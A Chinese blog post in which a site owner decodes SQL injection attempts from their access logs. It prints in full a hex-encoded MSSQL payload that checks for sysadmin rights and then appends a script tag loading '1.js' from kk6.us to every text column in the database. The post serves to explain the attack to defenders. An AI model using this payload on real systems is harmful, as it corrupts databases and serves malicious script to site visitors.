`

解码网站SQL注入代码

 
阅读更多

上次在QQ空间中说到SQL注入方法用HEX可绕过一般的IDS,果然这几天网站记录了此类非法扫描记录,还好俺的网站事先有准备,来看一下这些鸟人都干了些什么,找几个记录:

提交参数:1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1



解码一下这个:0x730079007300610064006D0069006E00
内容:sysadmin

这很明白,首先判断是否是sysadmin权限,下来就到这个:

提交参数:1;dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--


再解码一下内容变成了:dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=u AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec(UpDaTe [+@t+] sEt [+@c+]=rtrim(convert(vArChAr,[+@c+]))+</title><script src=http://kk6.us/1.js></script>) fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

看来还是有点乱,再把上面的转换成小写:declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec(update [+@t+] set [+@c+]=rtrim(convert(varchar,[+@c+]))+</title><script src=http://kk6.us/1.js></script>) fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

好了,经过解码基本能看明白了,简单解释一下,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入代 码:</title><script src=http://kk6.us/1.js></script>

其中(kk6.us)这段也是经过URL编码的,解码一下变成了:kk6.us
也就是在数据库列中插入代码:</title><script src=http://kk6.us/1.js></script>

好了,只要你的网页从数据库中读取带有此代码的列,便会出现错误,也就是会从kk6.us中读取1.js文件,只要你访问,嘿嘿,你完了……

简单介绍了一下最近注行的注入方法,有什么说得不对的请各位高手多多批评。

分享到:
评论

相关推荐

    青果教务网络管理系统入侵破解详细过程

    开始以为仅仅是base64编码而已,但是没法用base64解码,登陆界面需要调用数据库的地方没有发现有关的代码,然后用reflector反编译DLL文件,发现它的数据库加密函数,如下图 可以看出,把需要加密的字符串pStr...

    风越ASP代码生成器2.8

    09、支持对用户输入内容进行服务器端与客户端JS双重验证,有效防止SQL注入 ★ 10、支持自动生成多组多级的级联下拉框功能,快速建立如:省、市、县/公司、部门、小组等形式下拉框 ★ 11、支持表单提交超过100KB的...

    风越.Net代码生成器 [FireCode Creator] V1.3 精简版

    09、支持对用户输入内容进行服务器端与客户端JS双重验证,有效防止SQL注入 ★ 10、支持自动生成多组多级的级联下拉框功能,快速建立如:省、市、县/公司、部门、小组等形式下拉框 ★ 11、支持表单提交超过100KB的...

    风越ASP代码生成器FireAspCreatorv2.9.rar

    09、支持对用户输入内容进行服务器端与客户端JS双重验证,有效防止SQL注入 ★ 10、支持自动生成多组多级的级联下拉框功能,快速建立如:省、市、县/公司、部门、小组等形式下拉框 ★ 11、支持表单提交超过100KB的...

    JAVA上百实例源码以及开源项目源代码

    将其解码,李四用张三的公钥加密信息,并发送给李四,张三用自己的私钥解密从李四处收到的信息…… Java利用DES私钥对称加密代码实例 同上 java聊天室 2个目标文件,简单。 java模拟掷骰子2个 1个目标文件,输出演示...

    风越.net代码生成器v2.9

    09、支持对用户输入内容进行服务器端与客户端JS双重验证,有效防止SQL注入 ★ 10、支持自动生成多组多级的级联下拉框功能,快速建立如:省、市、县/公司、部门、小组等形式下拉框 ★ 11、支持表单提交超过100KB的...

    风越ASP代码生成器 2.4

    09、支持对用户输入内容进行服务器端与客户端JS双重验证,有效防止SQL注入 ★ 10、支持自动生成多组多级的级联下拉框功能,快速建立如:省、市、县/公司、部门、小组等形式下拉框 ★ 11、支持表单提交超过100KB的...

    JAVA上百实例源码以及开源项目

     Java二进制IO类与文件复制操作实例,好像是一本书的例子,源代码有的是独立运行的,与同目录下的其它代码文件互不联系,这些代码面向初级、中级Java程序员。 Java访问权限控制源代码 1个目标文件 摘要:Java源码,...

    WEB前端助手(FeHelper)_v2019.09.0320.crx

    代码美化工具(HTML/CSS/JS/XML/SQL) 代码压缩工具(HTML/CSS/JS) 二维码生成器(支持当前页面、图片、链接、选中的文字生成QrCode) 二维码解码器(支持网页二维码右键解码) 简易Postman(Api接口测试,模拟...

    [完整][中文][WEB安全测试].(美)霍普.扫描版.pdf

     ·从许多不同的模拟常见攻击(比如SQL注入、跨站式脚本和操纵隐藏表单域)的方法中进行选择  ·作为自动化测试的出发点,通过使用秘诀中的脚本和例子,使你的测试可重复  不用再担心午夜来电话告诉你站点被破坏了...

    h4ck3r:Chromefirefox浏览器的浏览器扩展。 开发人员和测试人员的小工具

    h4ck3r Chrome / firefox浏览器的浏览器扩展。 开发人员和测试人员的小工具。... Wiki( SQL注入, Python , Linux ,网络等有用的文档)。 自动表格填充器(不支持单选按钮。) 自动装弹自动表格清洁器笔记从版本0

    php网络开发完全手册

    11.4.2 解码字符串——urldecode 181 11.5 小结 182 第12章 PHP与JavaScript交互 183 12.1 JavaScript简介 183 12.2 JavaScript的数据类型 183 12.3 JavaScript程序设计基础 184 12.3.1 在HTML中嵌入JavaScript 184 ...

    Snippet Library-crx插件

    代码片段下面是此扩展程序当前可用的代码片段列表帮助*关于*版本利用*注入:SQL *注入:XSS可访问性*元素:具有相同ID的突出显示*元素:具有相同ID的删除*启用:右键单击*启用:文本选择*启用:粘贴*文本:...

    2020易语言模块大全持续更新1.zip

    DLL注入模块.ec DOS命令模块.ec E.M.O_11.ec EC.EC ecom.ec EdbServer1.0客户端.ec EDB、高级表格、XLS互换.ec edb到html-1.0.ec EDB数据库客户端模块 1.0.ec edb数据库转Excel模块 1.0.ec edb数据库转Excel模块 1.3...

    网络渗透技术

    3.4.4 解码Shellcode 3.4.5 渗透防火墙的Shellcode 第4章 堆溢出利用技术 第5章 格式化串漏洞利用技术 第6章 内核溢出利用技术 第7章 其他利用技术 第8章 漏洞发掘分析 第9章 CGI渗透测试技术 第10章 SQL注入利用...

    03开源NewSql数据库TiDB-Deep Dive into TiDB

    在 Chaos 测试上面,TiDB 引入了更多的错误注入工具,例如使用 systemtap 对 I/O 进行 delay 等,也在代码特定的业务的逻辑进行错误注入测试,充分保证 TiDB 在异常条件下面也能稳定运行。 TiDB 的开发团队之前做了...

    易语言模块大全(401个)

    代码编辑器部分模块.ec Sqlite数据库加强.ec 自解压制作.ec 注册热键_支持多热键(20050816).ec 操作外部组合框.ec 操作外部列表框.ec 办公组件密码管理模块.ec 执行文件模块.ec 安全关机.ec 超级列表框列宽尺寸自动...

    SnSitesV1.0.1共享版本

    4,任意栏目配置批量增加,任意页面区域批量注入, 让你可以在短短的弹指一挥间配置起默认的下载站,ISP专用站,新闻站,技术站等等网站. 5,任意位置,任意栏目内容与新闻全站搜索. 6,增加新闻功能模块. 7,出现的...

Global site tag (gtag.js) - Google Analytics